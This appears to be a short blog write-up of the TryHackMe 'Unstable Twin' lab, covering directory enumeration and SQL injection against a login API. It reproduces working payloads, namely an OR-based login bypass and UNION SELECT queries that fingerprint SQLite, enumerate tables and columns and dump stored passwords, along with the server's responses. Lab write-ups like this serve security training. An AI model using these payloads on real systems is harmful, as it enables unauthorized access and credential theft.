THM: Unstable Twin

THM: Unstable Twin

This is Unstable Twin from THM. It’s medium rated, and says:

A Services based room, extracting information from HTTP Services and finding the hidden messages.

I’m not going to writeup the whole thing, because it’s got stego and I hate stego. It’s web to find some SSH credentials, then some nonsense with stego on the server.

Dirsearch only finds one thing with the default wordlist, and it’s this:

└─# python3 /opt/dirsearch/dirsearch.py -u http://10.10.173.244 
# snip

[01:05:34] Starting: 
[01:08:17] 200 -  148B  - /info   

If we go to http://10.10.173.244/info, we get this:

The login API needs to be called with the username and password form fields fields. It has not been fully tested yet so may not be full developed and secure

The webserver is nginx. If we try a GET request with the fields we get a message about the method not allowed, so we use POST. There is a SQL injection which we can detect fairly easily. This:

POST /api/login HTTP/1.1
Host: 10.10.173.244
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

username=user&password='+OR+1+--+-

Gets us this:

HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Sat, 01 May 2021 05:17:42 GMT
Content-Type: application/json
Content-Length: 159
Connection: close

[
  [
    1, 
    "mary_ann"
  ], 
  [
    2, 
    "julias"
  ], 
  [
    3, 
    "vincent"
  ], 
  [
    4, 
    "linda"
  ], 
  [
    5, 
    "marnie"
  ]
]

And we can assume those are users. The weird thing about this box is you have to send the requests twice. sqlmap cannot handle this box, and I assume that’s because of the double request thing. Anyway, manual commands:

Detect DB (sqlite):

username=1' UNION SELECT 1,sqlite_version();--&password=what

Response:

“3.26.0”

Table names:

username=1' UNION SELECT 1,group_concat(tbl_name) from sqlite_master where type='table' and tbl_name not like 'sqlite_%'--&password=what

Response (trimmed):

“users,notes”

Column names:

username=1' UNION SELECT 1,group_concat(sql) from sqlite_master where tbl_name = 'users' AND type = 'table'--&password=what

Response (trimmed):

“CREATE TABLE "users" (\n\t"id"\tINTEGER UNIQUE,\n\t"username"\tTEXT NOT NULL UNIQUE,\n\t"password"\tTEXT NOT NULL UNIQUE,\n\tPRIMARY KEY("id" AUTOINCREMENT)\n)”

Data exfil:

username=1' UNION SELECT 1,group_concat(password) from users--&password=what

Response:

“Green,Orange,Red,Yellow ,continue…”

And after that the rest is kinda whatever.